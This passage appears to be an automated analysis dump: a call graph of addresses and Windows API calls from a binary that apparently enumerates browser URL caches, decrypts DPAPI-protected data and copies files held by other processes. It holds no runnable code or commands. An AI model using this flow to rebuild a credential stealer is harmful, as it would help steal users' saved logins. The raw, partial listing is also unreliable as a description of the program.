39705 447920 memcpy memcpy memcpy 38881->39705 38882->38881 38883->38881 38884->38409 38886 40aed1 38885->38886 38887 40aec7 FindClose 38885->38887 38886->38463 38887->38886 38889 4099d7 38888->38889 38890 4099da memcpy 38888->38890 38889->38890 38890->38393 38892 40b2cc 27 API calls 38891->38892 38893 44543f 38892->38893 38894 409d1f 6 API calls 38893->38894 38895 44544f 38894->38895 39799 409b98 GetFileAttributesW 38895->39799 38897 44545e 38898 445476 38897->38898 38899 40b6ef 253 API calls 38897->38899 38900 40b2cc 27 API calls 38898->38900 38899->38898 38901 445482 38900->38901 38902 409d1f 6 API calls 38901->38902 38903 445492 38902->38903 39800 409b98 GetFileAttributesW 38903->39800 38905 4454a1 38906 4454b9 38905->38906 38907 40b6ef 253 API calls 38905->38907 38906->38422 38907->38906 38908->38421 38909->38439 38910->38446 38911->38484 38912->38466 38913->38511 38914->38511 38915->38493 38916->38522 38917->38524 38918->38526 38920 414c2e 16 API calls 38919->38920 38921 40c2ae 38920->38921 38991 40c1d3 38921->38991 38926 40c3be 38943 40a8ab 38926->38943 38927 40afcf 2 API calls 38928 40c2fd FindFirstUrlCacheEntryW 38927->38928 38929 40c3b6 38928->38929 38930 40c31e wcschr 38928->38930 38931 40b04b ??3@YAXPAX 38929->38931 38932 40c331 38930->38932 38933 40c35e FindNextUrlCacheEntryW 38930->38933 38931->38926 38934 40a8ab 9 API calls 38932->38934 38933->38930 38935 40c373 GetLastError 38933->38935 38938 40c33e wcschr 38934->38938 38936 40c3ad FindCloseUrlCache 38935->38936 38937 40c37e 38935->38937 38936->38929 38939 40afcf 2 API calls 38937->38939 38938->38933 38940 40c34f 38938->38940 38941 40c391 FindNextUrlCacheEntryW 38939->38941 38942 40a8ab 9 API calls 38940->38942 38941->38930 38941->38936 38942->38933 39085 40a97a 38943->39085 38946 40a8cc 38946->38533 38947 40a8d0 7 API calls 38947->38946 39090 40b1ab free free 38948->39090 38950 40c3dd 38951 40b2cc 27 API calls 38950->38951 38952 40c3e7 38951->38952 39091 414592 RegOpenKeyExW 38952->39091 38954 40c3f4 38955 40c50e 38954->38955 38956 40c3ff 38954->38956 38970 405337 38955->38970 38957 40a9ce 4 API calls 38956->38957 38958 40c418 memset 38957->38958 39092 40aa1d 38958->39092 38961 40c471 38963 40c47a _wcsupr 38961->38963 38962 40c505 RegCloseKey 38962->38955 38964 40a8d0 7 API calls 38963->38964 38965 40c498 38964->38965 38966 40a8d0 7 API calls 38965->38966 38967 40c4ac memset 38966->38967 38968 40aa1d 38967->38968 38969 40c4e4 RegEnumValueW 38968->38969 38969->38962 38969->38963 39094 405220 38970->39094 38974 4099c6 2 API calls 38973->38974 38975 40a714 _wcslwr 38974->38975 38976 40c634 38975->38976 39151 405361 38976->39151 38979 40c65c wcslen 39154 4053b6 39 API calls 38979->39154 38980 40c71d wcslen 38980->38543 38982 40c713 39157 4053df 39 API calls 38982->39157 38983 40c677 38983->38982 39155 40538b 39 API calls 38983->39155 38986 40c6a5 38986->38982 38987 40c6a9 memset 38986->38987 38988 40c6d3 38987->38988 39156 40c589 44 API calls 38988->39156 38990->38540 38992 40ae18 9 API calls 38991->38992 38998 40c210 38992->38998 38993 40ae51 9 API calls 38993->38998 38994 40c264 38995 40aebe FindClose 38994->38995 38997 40c26f 38995->38997 38996 40add4 2 API calls 38996->38998 39003 40e5ed memset memset 38997->39003 38998->38993 38998->38994 38998->38996 38999 40c231 _wcsicmp 38998->38999 39000 40c1d3 35 API calls 38998->39000 38999->38998 39001 40c248 38999->39001 39000->38998 39016 40c084 22 API calls 39001->39016 39004 414c2e 16 API calls 39003->39004 39005 40e63f 39004->39005 39006 409d1f 6 API calls 39005->39006 39007 40e658 39006->39007 39017 409b98 GetFileAttributesW 39007->39017 39009 40e667 39010 40e680 39009->39010 39012 409d1f 6 API calls 39009->39012 39018 409b98 GetFileAttributesW 39010->39018 39012->39010 39013 40e68f 39014 40c2d8 39013->39014 39019 40e4b2 39013->39019 39014->38926 39014->38927 39016->38998 39017->39009 39018->39013 39040 40e01e 39019->39040 39021 40e593 39022 40e5b0 39021->39022 39023 40e59c DeleteFileW 39021->39023 39025 40b04b ??3@YAXPAX 39022->39025 39023->39022 39024 40e521 39024->39021 39063 40e175 39024->39063 39026 40e5bb 39025->39026 39028 40e5c4 CloseHandle 39026->39028 39029 40e5cc 39026->39029 39028->39029 39031 40b633 free 39029->39031 39030 40e573 39033 40e584 39030->39033 39034 40e57c CloseHandle 39030->39034 39032 40e5db 39031->39032 39037 40b633 free 39032->39037 39084 40b1ab free free 39033->39084 39034->39033 39036 40e540 39036->39030 39083 40e2ab 30 API calls 39036->39083 39038 40e5e3 39037->39038 39038->39014 39041 406214 22 API calls 39040->39041 39042 40e03c 39041->39042 39043 40e16b 39042->39043 39044 40dd85 74 API calls 39042->39044 39043->39024 39045 40e06b 39044->39045 39045->39043 39046 40afcf ??2@YAPAXI ??3@YAXPAX 39045->39046 39047 40e08d OpenProcess 39046->39047 39048 40e0a4 GetCurrentProcess DuplicateHandle 39047->39048 39052 40e152 39047->39052 39049 40e0d0 GetFileSize 39048->39049 39050 40e14a CloseHandle 39048->39050 39053 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39049->39053 39050->39052 39051 40e160 39055 40b04b ??3@YAXPAX 39051->39055 39052->39051 39054 406214 22 API calls 39052->39054 39056 40e0ea 39053->39056 39054->39051 39055->39043 39057 4096dc CreateFileW 39056->39057 39058 40e0f1 CreateFileMappingW 39057->39058 39059 40e140 CloseHandle CloseHandle 39058->39059 39060 40e10b MapViewOfFile 39058->39060 39059->39050 39061 40e13b CloseHandle 39060->39061 39062 40e11f WriteFile UnmapViewOfFile 39060->39062 39061->39059 39062->39061 39064 40e18c 39063->39064 39065 406b90 11 API calls 39064->39065 39066 40e19f 39065->39066 39067 40e1a7 memset 39066->39067 39068 40e299 39066->39068 39073 40e1e8 39067->39073 39069 4069a3 ??3@YAXPAX free 39068->39069 39070 40e2a4 39069->39070 39070->39036 39071 406e8f 13 API calls 39071->39073 39072 406b53 SetFilePointerEx ReadFile 39072->39073 39073->39071 39073->39072 39074 40e283 39073->39074 39075 40dd50 _wcsicmp 39073->39075 39079 40742e 8 API calls 39073->39079 39080 40aae3 wcslen wcslen _memicmp 39073->39080 39081 40e244 _snwprintf 39073->39081 39076 40e291 39074->39076 39077 40e288 free 39074->39077 39075->39073 39078 40aa04 free 39076->39078 39077->39076 39078->39068 39079->39073 39080->39073 39082 40a8d0 7 API calls 39081->39082 39082->39073 39083->39036 39084->39021 39086 40a980 39085->39086 39087 40a8bb 39086->39087 39088 40a995 _wcsicmp 39086->39088 39089 40a99c wcscmp 39086->39089 39087->38946 39087->38947 39088->39086 39089->39086 39090->38950 39091->38954 39093 40aa23 RegEnumValueW 39092->39093 39093->38961 39093->38962 39095 405335 39094->39095 39096 40522a 39094->39096 39095->38543 39097 40b2cc 27 API calls 39096->39097 39098 405234 39097->39098 39099 40a804 8 API calls 39098->39099 39100 40523a 39099->39100 39139 40b273 39100->39139 39102 405248 _mbscpy _mbscat GetProcAddress 39103 40b273 27 API calls 39102->39103 39104 405279 39103->39104 39142 405211 GetProcAddress 39104->39142 39106 405282 39107 40b273 27 API calls 39106->39107 39108 40528f 39107->39108 39143 405211 GetProcAddress 39108->39143 39110 405298 39111 40b273 27 API calls 39110->39111 39112 4052a5 39111->39112 39144 405211 GetProcAddress 39112->39144 39114 4052ae 39115 40b273 27 API calls 39114->39115 39116 4052bb 39115->39116 39145 405211 GetProcAddress 39116->39145 39118 4052c4 39119 40b273 27 API calls 39118->39119 39120 4052d1 39119->39120 39146 405211 GetProcAddress 39120->39146 39122 4052da 39123 40b273 27 API calls 39122->39123 39124 4052e7 39123->39124 39147 405211 GetProcAddress 39124->39147 39126 4052f0 39127 40b273 27 API calls 39126->39127 39128 4052fd 39127->39128 39148 405211 GetProcAddress 39128->39148 39130 405306 39131 40b273 27 API calls 39130->39131 39132 405313 39131->39132 39149 405211 GetProcAddress 39132->39149 39134 40531c 39135 40b273 27 API calls 39134->39135 39136 405329 39135->39136 39150 405211 GetProcAddress 39136->39150 39138 405332 39138->39095 39140 40b58d 27 API calls 39139->39140 39141 40b18c 39140->39141 39141->39102 39142->39106 39143->39110 39144->39114 39145->39118 39146->39122 39147->39126 39148->39130 39149->39134 39150->39138 39152 405220 39 API calls 39151->39152 39153 405369 39152->39153 39153->38979 39153->38980 39154->38983 39155->38986 39156->38982 39157->38980 39159 40440c FreeLibrary 39158->39159 39160 40436d 39159->39160 39161 40a804 8 API calls 39160->39161 39162 404377 39161->39162 39163 404383 39162->39163 39164 404405 39162->39164 39165 40b273 27 API calls 39163->39165 39164->38552 39164->38554 39164->38555 39166 40438d GetProcAddress 39165->39166 39167 40b273 27 API calls 39166->39167 39168 4043a7 GetProcAddress 39167->39168 39169 40b273 27 API calls 39168->39169 39170 4043ba GetProcAddress 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4043ce GetProcAddress 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4043e2 GetProcAddress 39173->39174 39175 4043f1 39174->39175 39176 4043f7 39175->39176 39177 40440c FreeLibrary 39175->39177 39176->39164 39177->39164 39179 404413 FreeLibrary 39178->39179 39180 40441e 39178->39180 39179->39180 39180->38569 39181->38561 39183 40447e 39182->39183 39184 40442e 39182->39184 39185 404485 CryptUnprotectData 39183->39185 39186 40449c 39183->39186 39187 40b2cc 27 API calls 39184->39187 39185->39186 39186->38561 39188 404438 39187->39188 39189 40a804 8 API calls 39188->39189 39190 40443e 39189->39190 39191 404445 39190->39191 39192 404467 39190->39192 39193 40b273 27 API calls 39191->39193 39192->39183 39194 404475 FreeLibrary 39192->39194 39195 40444f GetProcAddress 39193->39195 39194->39183 39195->39192 39196 404460 39195->39196 39196->39192 39198 4135f6 39197->39198 39199 4135eb FreeLibrary 39197->39199 39198->38572 39199->39198 39201 4449c4 39200->39201 39202 444a52 39200->39202 39203 40b2cc 27 API calls 39201->39203 39202->38589 39202->38590 39204 4449cb 39203->39204 39205 40a804 8 API calls 39204->39205 39206 4449d1 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4449dc GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4449f3 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 444a04 GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 444a15 GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 444a26 GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 444a37 GetProcAddress 39217->39218 39219 40b273 27 API calls 39218->39219 39220 444a48 GetProcAddress 39219->39220 39220->39202 39221->38600 39222->38600 39223->38600 39224->38600 39225->38591 39227 403a29 39226->39227 39241 403bed memset memset 39227->39241 39229 403ae7 39254 40b1ab free free 39229->39254 39230 403a3f memset 39235 403a2f 39230->39235 39232 403aef 39232->38607 39233 40a8d0 7 API calls 39233->39235 39234 409d1f 6 API calls 39234->39235 39235->39229 39235->39230 39235->39233 39235->39234 39236 409b98 GetFileAttributesW 39235->39236 39236->39235 39238 40a051 GetFileTime CloseHandle 39237->39238 39239 4039ca CompareFileTime 39237->39239 39238->39239 39239->38607 39240->38608 39242 414c2e 16 API calls 39241->39242 39243 403c38 39242->39243 39244 409719 2 API calls 39243->39244 39245 403c3f wcscat 39244->39245 39246 414c2e 16 API calls 39245->39246 39247 403c61 39246->39247 39248 409719 2 API calls 39247->39248 39249 403c68 wcscat 39248->39249 39255 403af5 39249->39255 39252 403af5 20 API calls 39253 403c95 39252->39253 39253->39235 39254->39232 39256 403b02 39255->39256 39257 40ae18 9 API calls 39256->39257 39265 403b37 39257->39265 39258 403bdb 39260 40aebe FindClose 39258->39260 39259 40add4 wcscmp wcscmp 39259->39265 39261 403be6 39260->39261 39261->39252 39262 40ae18 9 API calls 39262->39265 39263 40ae51 9 API calls 39263->39265 39264 40aebe FindClose 39264->39265 39265->39258 39265->39259 39265->39262 39265->39263 39265->39264 39266 40a8d0 7 API calls 39265->39266 39266->39265 39268 409d1f 6 API calls 39267->39268 39269 404190 39268->39269 39282 409b98 GetFileAttributesW 39269->39282 39271 40419c 39272 4041a7 6 API calls 39271->39272 39273 40435c 39271->39273 39275 40424f 39272->39275 39273->38634 39275->39273 39276 40425e memset 39275->39276 39278 409d1f 6 API calls 39275->39278 39279 40a8ab 9 API calls 39275->39279 39283 414842 39275->39283 39276->39275 39277 404296 wcscpy 39276->39277 39277->39275 39278->39275 39280 4042b6 memset memset _snwprintf wcscpy 39279->39280 39280->39275 39281->38632 39282->39271 39286 41443e 39283->39286 39285 414866 39285->39275 39287 41444b 39286->39287 39288 414451 39287->39288 39289 4144a3 GetPrivateProfileStringW 39287->39289 39290 414491 39288->39290 39291 414455 wcschr 39288->39291 39289->39285 39293 414495 WritePrivateProfileStringW 39290->39293 39291->39290 39292 414463 _snwprintf 39291->39292 39292->39293 39293->39285 39294->38638 39296 40b2cc 27 API calls 39295->39296 39297 409615 39296->39297 39298 409d1f 6 API calls 39297->39298 39299 409625 39298->39299 39324 409b98 GetFileAttributesW 39299->39324 39301 409634 39302 409648 39301->39302 39325 4091b8 memset 39301->39325 39304 40b2cc 27 API calls 39302->39304 39306 408801 39302->39306 39305 40965d 39304->39305 39307 409d1f 6 API calls 39305->39307 39306->38641 39306->38642 39308 40966d 39307->39308 39377 409b98 GetFileAttributesW 39308->39377 39310 40967c 39310->39306 39311 409681 39310->39311 39378 409529 72 API calls 39311->39378 39313 409690 39313->39306 39314->38664 39315->38641 39324->39301 39379 40a6e6 WideCharToMultiByte 39325->39379 39327 409202 39380 444432 39327->39380 39330 40b273 27 API calls 39331 409236 39330->39331 39426 438552 39331->39426 39334 409383 39336 40b273 27 API calls 39334->39336 39338 409399 39336->39338 39340 438552 134 API calls 39338->39340 39358 4093a3 39340->39358 39344 4094ff 39455 443d90 39344->39455 39347 4251c4 137 API calls 39347->39358 39349 409507 39357 40951d 39349->39357 39351 4093df 39454 424f26 123 API calls 39351->39454 39355 4253cf 17 API calls 39355->39358 39357->39302 39358->39344 39358->39347 39358->39351 39358->39355 39360 4093e4 39358->39360 39452 4253af 17 API calls 39360->39452 39367 4093ed 39453 4253af 17 API calls 39367->39453 39377->39310 39378->39313 39379->39327 39476 4438b5 39380->39476 39382 44444c 39388 409215 39382->39388 39490 415a6d 39382->39490 39384 444486 39387 4444b9 memcpy 39384->39387 39425 4444a4 39384->39425 39385 4442e6 11 API calls 39386 44469e 39385->39386 39386->39388 39390 443d90 111 API calls 39386->39390 39494 415258 39387->39494 39388->39330 39388->39357 39390->39388 39391 444524 39392 444541 39391->39392 39393 44452a 39391->39393 39497 444316 39392->39497 39394 416935 16 API calls 39393->39394 39394->39425 39397 444316 18 API calls 39398 444563 39397->39398 39399 444316 18 API calls 39398->39399 39400 44456f 39399->39400 39401 444316 18 API calls 39400->39401 39425->39385 39564 438460 39426->39564 39428 409240 39428->39334 39429 4251c4 39428->39429 39576 424f07 39429->39576 39431 4251e4 39432 4251f7 39431->39432 39433 4251e8 39431->39433 39584 4250f8 39432->39584 39583 4446ea 11 API calls 39433->39583 39435 4251f2 39452->39367 39454->39344 39456 443da3 39455->39456 39457 443db6 39455->39457 39600 41707a 39456->39600 39457->39349 39477 4438d0 39476->39477 39488 4438c9 39476->39488 39478 415378 memcpy memcpy 39477->39478 39479 4438d5 39478->39479 39480 4154e2 10 API calls 39479->39480 39481 443906 39479->39481 39479->39488 39480->39481 39482 443970 memset 39481->39482 39481->39488 39484 44398b 39482->39484 39483 4439a0 39485 415700 10 API calls 39483->39485 39483->39488 39484->39483 39486 41975c 10 API calls 39484->39486 39487 4439c0 39485->39487 39486->39483 39487->39488 39489 418981 10 API calls 39487->39489 39488->39382 39489->39488 39491 415a77 39490->39491 39492 415a8d 39491->39492 39493 415a7e memset 39491->39493 39492->39384 39493->39492 39495 4438b5 11 API calls 39494->39495 39496 41525d 39495->39496 39496->39391 39498 444328 39497->39498 39499 444423 39498->39499 39500 44434e 39498->39500 39501 4446ea 11 API calls 39499->39501 39502 432d4e memset memset memcpy 39500->39502 39508 444381 39501->39508 39503 44435a 39502->39503 39505 444375 39503->39505 39510 44438b 39503->39510 39504 432d4e memset memset memcpy 39506 4443ec 39504->39506 39507 416935 16 API calls 39505->39507 39506->39508 39509 416935 16 API calls 39506->39509 39507->39508 39508->39397 39509->39508 39510->39504 39565 41703f 11 API calls 39564->39565 39566 43847a 39565->39566 39567 43848a 39566->39567 39568 43847e 39566->39568 39570 438270 134 API calls 39567->39570 39569 4446ea 11 API calls 39568->39569 39572 438488 39569->39572 39571 4384aa 39570->39571 39571->39572 39573 424f26 123 API calls 39571->39573 39572->39428 39574 4384bb 39573->39574 39575 438270 134 API calls 39574->39575 39575->39572 39577 424f1f 39576->39577 39578 424f0c 39576->39578 39580 424eea 11 API calls 39577->39580 39579 416760 11 API calls 39578->39579 39581 424f18 39579->39581 39582 424f24 39580->39582 39581->39431 39582->39431 39583->39435 39585 425108 39584->39585 39591 42510d 39584->39591 39643 413f4f 39616->39643 39619 413f37 K32GetModuleFileNameExW 39620 413f4a 39619->39620 39620->38700 39622 413969 wcscpy 39621->39622 39623 41396c wcschr 39621->39623 39634 413a3a 39622->39634 39623->39622 39625 41398e 39623->39625 39648 4097f7 wcslen wcslen _memicmp 39625->39648 39627 41399a 39628 4139a4 memset 39627->39628 39629 4139e6 39627->39629 39649 409dd5 GetWindowsDirectoryW wcscpy 39628->39649 39630 413a31 wcscpy 39629->39630 39631 4139ec memset 39629->39631 39630->39634 39650 409dd5 GetWindowsDirectoryW wcscpy 39631->39650 39634->38700 39635 4139c9 wcscpy wcscat 39635->39634 39636 413a11 memcpy wcscat 39636->39634 39638 413cb0 GetModuleHandleW 39637->39638 39639 413cda 39637->39639 39638->39639 39640 413cbf GetProcAddress 39638->39640 39641 413ce3 GetProcessTimes 39639->39641 39642 413cf6 39639->39642 39640->39639 39641->38703 39642->38703 39644 413f2f 39643->39644 39645 413f54 39643->39645 39644->39619 39644->39620 39646 40a804 8 API calls 39645->39646 39647 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39646->39647 39647->39644 39648->39627 39649->39635 39650->39636 39651->38724 39652->38747 39654 409cf9 GetVersionExW 39653->39654 39655 409d0a 39653->39655 39654->39655 39655->38753 39655->38758 39656->38759 39657->38762 39658->38764 39659->38830 39661 40bba5 39660->39661 39708 40cc26 39661->39708 39664 40bd4b 39729 40cc0c 39664->39729 39669 40b2cc 27 API calls 39670 40bbef 39669->39670 39736 40ccf0 _wcsicmp 39670->39736 39672 40bbf5 39672->39664 39737 40ccb4 6 API calls 39672->39737 39674 40bc26 39675 40cf04 17 API calls 39674->39675 39676 40bc2e 39675->39676 39677 40bd43 39676->39677 39678 40b2cc 27 API calls 39676->39678 39679 40cc0c 4 API calls 39677->39679 39680 40bc40 39678->39680 39679->39664 39738 40ccf0 _wcsicmp 39680->39738 39682 40bc46 39682->39677 39683 40bc61 memset memset WideCharToMultiByte 39682->39683 39739 40103c strlen 39683->39739 39685 40bcc0 39686 40b273 27 API calls 39685->39686 39687 40bcd0 memcmp 39686->39687 39687->39677 39688 40bce2 39687->39688 39689 404423 38 API calls 39688->39689 39690 40bd10 39689->39690 39690->39677 39691 40bd3a LocalFree 39690->39691 39692 40bd1f memcpy 39690->39692 39691->39677 39692->39691 39693->38845 39695 409a74 GetTempFileNameW 39694->39695 39696 409a66 GetWindowsDirectoryW 39694->39696 39695->38843 39696->39695 39697->38881 39698->38881 39699->38881 39700->38881 39701->38881 39702->38881 39703->38881 39704->38881 39705->38881 39706->38857 39707->38878 39740 4096c3 CreateFileW 39708->39740 39710 40cc34 39711 40cc3d GetFileSize 39710->39711 39719 40bbca 39710->39719 39712 40afcf 2 API calls 39711->39712 39713 40cc64 39712->39713 39741 40a2ef ReadFile 39713->39741 39715 40cc71 39742 40ab4a MultiByteToWideChar 39715->39742 39717 40cc95 CloseHandle 39718 40b04b ??3@YAXPAX 39717->39718 39718->39719 39719->39664 39720 40cf04 39719->39720 39721 40b633 free 39720->39721 39722 40cf14 39721->39722 39748 40b1ab free free 39722->39748 39724 40bbdd 39724->39664 39724->39669 39725 40cf1b 39725->39724 39727 40cfef 39725->39727 39749 40cd4b 39725->39749 39728 40cd4b 14 API calls 39727->39728 39728->39724 39730 40b633 free 39729->39730 39731 40cc15 39730->39731 39732 40aa04 free 39731->39732 39733 40cc1d 39732->39733 39798 40b1ab free free 39733->39798 39735 40b7d4 memset CreateFileW 39735->38837 39735->38838 39736->39672 39737->39674 39738->39682 39739->39685 39740->39710 39741->39715 39743 40ab93 39742->39743 39744 40ab6b 39742->39744 39743->39717 39745 40a9ce 4 API calls 39744->39745 39746 40ab74 39745->39746 39747 40ab7c MultiByteToWideChar 39746->39747 39747->39743 39748->39725 39750 40cd7b 39749->39750 39783 40aa29 39750->39783 39752 40cef5 39753 40aa04 free 39752->39753 39754 40cefd 39753->39754 39754->39725 39756 40aa29 6 API calls 39757 40ce1d 39756->39757 39758 40aa29 6 API calls 39757->39758 39759 40ce3e 39758->39759 39760 40ce6a 39759->39760 39791 40abb7 wcslen memmove 39759->39791 39761 40ce9f 39760->39761 39794 40abb7 wcslen memmove 39760->39794 39763 40a8d0 7 API calls 39761->39763 39766 40ceb5 39763->39766 39764 40ce56 39792 40aa71 wcslen 39764->39792 39772 40a8d0 7 API calls 39766->39772 39768 40ce8b 39795 40aa71 wcslen 39768->39795 39769 40ce5e 39793 40abb7 wcslen memmove 39769->39793 39774 40cecb 39772->39774 39773 40ce93 39796 40abb7 wcslen memmove 39773->39796 39797 40d00b malloc memcpy free free 39774->39797 39777 40cedd 39778 40aa04 free 39777->39778 39779 40cee5 39778->39779 39780 40aa04 free 39779->39780 39781 40ceed 39780->39781 39782 40aa04 free 39781->39782 39782->39752 39784 40aa33 39783->39784 39785 40aa63 39783->39785 39786 40aa44 39784->39786 39787 40aa38 wcslen 39784->39787 39785->39752 39785->39756 39788 40a9ce malloc memcpy free free 39786->39788 39787->39786 39789 40aa4d 39788->39789 39789->39785 39790 40aa51 memcpy 39789->39790 39790->39785 39791->39764 39792->39769 39793->39760 39794->39768 39795->39773 39796->39761 39797->39777 39798->39735 39799->38897 39800->38905 37666 44dea5 37667 44deb5 FreeLibrary 37666->37667 37668 44dec3 37666->37668 37667->37668 39877 4148b6 FindResourceW 39878 4148cf SizeofResource 39877->39878 39881 4148f9 39877->39881 39879 4148e0 LoadResource 39878->39879 39878->39881 39880 4148ee LockResource 39879->39880 39879->39881 39880->39881 37842 415304 free 39801 427533 39804 427548 39801->39804 39814 425711 39801->39814 39802 4259da 39858 416760 11 API calls 39802->39858 39803 4275cb 39838 425506 39803->39838 39804->39803 39812 429b7a 39804->39812 39806 4260dd 39859 424251 120 API calls 39806->39859 39807 4259c2 39834 425ad6 39807->39834 39852 415c56 11 API calls 39807->39852 39864 4446ce 11 API calls 39812->39864 39814->39802 39814->39807 39817 429a4d 39814->39817 39820 422aeb memset memcpy memcpy 39814->39820 39823 4260a1 39814->39823 39828 429ac1 39814->39828 39837 425a38 39814->39837 39848 4227f0 memset memcpy 39814->39848 39849 422b84 15 API calls 39814->39849 39850 422b5d memset memcpy memcpy 39814->39850 39851 422640 13 API calls 39814->39851 39853 4241fc 11 API calls 39814->39853 39854 42413a 90 API calls 39814->39854 39818 429a66 39817->39818 39819 429a9b 39817->39819 39860 415c56 11 API calls 39818->39860 39824 429a96 39819->39824 39862 416760 11 API calls 39819->39862 39820->39814 39857 415c56 11 API calls 39823->39857 39863 424251 120 API calls 39824->39863 39826 429a7a 39861 416760 11 API calls 39826->39861 39828->39802 39828->39834 39865 415c56 11 API calls 39828->39865 39837->39807 39855 422640 13 API calls 39837->39855 39856 4226e0 12 API calls 39837->39856 39839 425554 39838->39839 39840 42554d 39838->39840 39867 422586 12 API calls 39839->39867 39866 423b34 103 API calls 39840->39866 39843 425567 39844 4255ba 39843->39844 39845 42556c memset 39843->39845 39844->39814 39846 425596 39845->39846 39846->39844 39847 4255a4 memset 39846->39847 39847->39844 39848->39814 39849->39814 39850->39814 39851->39814 39852->39802 39853->39814 39854->39814 39855->39837 39856->39837 39857->39802 39858->39806 39859->39834 39860->39826 39861->39824 39862->39824 39863->39828 39864->39828 39865->39802 39866->39839 39867->39843 39882 441b3f 39892 43a9f6 39882->39892 39884 441b61 40065 4386af memset 39884->40065 39886 44189a 39887 4418e2 39886->39887 39891 442bd4 39886->39891 39888 4418ea 39887->39888 40066 4414a9 12 API calls 39887->40066 39891->39888 40067 441409 memset 39891->40067 39893 43aa20 39892->39893 39894 43aadf 39892->39894 39893->39894 39895 43aa34 memset 39893->39895 39894->39884 39896 43aa56 39895->39896 39897 43aa4d 39895->39897 40068 43a6e7 39896->40068 40076 42c02e memset 39897->40076 39902 43aad3 40078 4169a7 11 API calls 39902->40078 39903 43aaae 39903->39894 39903->39902 39918 43aae5 39903->39918 39904 43ac18 39907 43ac47 39904->39907 40080 42bbd5 memcpy memcpy memcpy memset memcpy 39904->40080 39908 43aca8 39907->39908 40081 438eed 16 API calls 39907->40081 39911 43acd5 39908->39911 40083 4233ae 11 API calls 39908->40083 40084 423426 11 API calls 39911->40084 39912 43ac87 40082 4233c5 16 API calls 39912->40082 39916 43ace1 40085 439811 163 API calls 39916->40085 39917 43a9f6 161 API calls 39917->39918 39918->39894 39918->39904 39918->39917 40079 439bbb 22 API calls 39918->40079 39920 43acfd 39926 43ad2c 39920->39926 40086 438eed 16 API calls 39920->40086 39922 43ad19 40087 4233c5 16 API calls 39922->40087 39923 43ad58 40088 44081d 163 API calls 39923->40088 39926->39923 39929 43add9 39926->39929 39928 43ae3a memset 39930 43ae73 39928->39930 39929->39929 40092 423426 11 API calls 39929->40092 40093 42e1c0 147 API calls 39930->40093 39931 43adab 40090 438c4e 163 API calls 39931->40090 39934 43ad6c 39934->39894 39934->39931 40089 42370b memset memcpy memset 39934->40089 39935 43adcc 40091 440f84 12 API calls 39935->40091 39936 43ae96 40094 42e1c0 147 API calls 39936->40094 39940 43aea8 39941 43aec1 39940->39941 40095 42e199 147 API calls 39940->40095 39943 43af00 39941->39943 40096 42e1c0 147 API calls 39941->40096 39943->39894 39946 43af1a 39943->39946 39947 43b3d9 39943->39947 40097 438eed 16 API calls 39946->40097 39952 43b3f6 39947->39952 39956 43b4c8 39947->39956 39949 43b60f 39949->39894 40156 4393a5 17 API calls 39949->40156 39950 43af2f 40098 4233c5 16 API calls 39950->40098 40138 432878 12 API calls 39952->40138 39954 43af51 40099 423426 11 API calls 39954->40099 39962 43b4f2 39956->39962 40144 42bbd5 memcpy memcpy memcpy memset memcpy 39956->40144 39958 43af7d 40100 423426 11 API calls 39958->40100 40145 43a76c 21 API calls 39962->40145 39963 43b529 40146 44081d 163 API calls 39963->40146 39964 43b462 40140 423330 11 API calls 39964->40140 39965 43af94 40101 423330 11 API calls 39965->40101 39969 43b47e 39973 43b497 39969->39973 40141 42374a memcpy memset memcpy memcpy memcpy 39969->40141 39970 43b544 39974 43b55c 39970->39974 40147 42c02e memset 39970->40147 39971 43b428 39971->39964 40139 432b60 16 API calls 39971->40139 39972 43afca 40102 423330 11 API calls 39972->40102 40142 4233ae 11 API calls 39973->40142 40148 43a87a 163 API calls 39974->40148 39980 43afdb 40103 4233ae 11 API calls 39980->40103 39982 43b56c 39985 43b58a 39982->39985 40149 423330 11 API calls 39982->40149 39983 43b4b1 40143 423399 11 API calls 39983->40143 39984 43afee 40104 44081d 163 API calls 39984->40104 40150 440f84 12 API calls 39985->40150 39990 43b4c1 40152 42db80 163 API calls 39990->40152 39992 43b592 40151 43a82f 16 API calls 39992->40151 39995 43b5b4 40153 438c4e 163 API calls 39995->40153 39997 43b5cf 40154 42c02e memset 39997->40154 39999 43b1ef 40115 4233c5 16 API calls 39999->40115 40000 43b005 40000->39894 40003 43b01f 40000->40003 40105 42d836 163 API calls 40000->40105 40003->39999 40113 423330 11 API calls 40003->40113 40114 42d71d 163 API calls 40003->40114 40004 43b212 40116 423330 11 API calls 40004->40116 40005 43b087 40106 4233ae 11 API calls 40005->40106 40007 43add4 40007->39949 40155 438f86 16 API calls 40007->40155 40011 43b22a 40117 42ccb5 11 API calls 40011->40117 40013 43b10f 40109 423330 11 API calls 40013->40109 40014 43b23f 40118 4233ae 11 API calls 40014->40118 40016 43b257 40119 4233ae 11 API calls 40016->40119 40020 43b129 40110 4233ae 11 API calls 40020->40110 40021 43b26e 40120 4233ae 11 API calls 40021->40120 40024 43b09a 40024->40013 40107 42cc15 19 API calls 40024->40107 40108 4233ae 11 API calls 40024->40108 40025 43b282 40121 43a87a 163 API calls 40025->40121 40027 43b13c 40111 440f84 12 API calls 40027->40111 40029 43b29d 40122 423330 11 API calls 40029->40122 40032 43b15f 40112 4233ae 11 API calls 40032->40112 40033 43b2af 40035 43b2b8 40033->40035 40036 43b2ce 40033->40036 40123 4233ae 11 API calls 40035->40123 40124 440f84 12 API calls 40036->40124 40039 43b2da 40125 42370b memset memcpy memset 40039->40125 40040 43b2c9 40126 4233ae 11 API calls 40040->40126 40043 43b2f9 40127 423330 11 API calls 40043->40127 40045 43b30b 40128 423330 11 API calls 40045->40128 40047 43b325 40129 423399 11 API calls 40047->40129 40049 43b332 40130 4233ae 11 API calls 40049->40130 40051 43b354 40131 423399 11 API calls 40051->40131 40053 43b364 40132 43a82f 16 API calls 40053->40132 40055 43b370 40133 42db80 163 API calls 40055->40133 40057 43b380 40134 438c4e 163 API calls 40057->40134 40059 43b39e 40135 423399 11 API calls 40059->40135 40061 43b3ae 40136 43a76c 21 API calls 40061->40136 40063 43b3c3 40137 423399 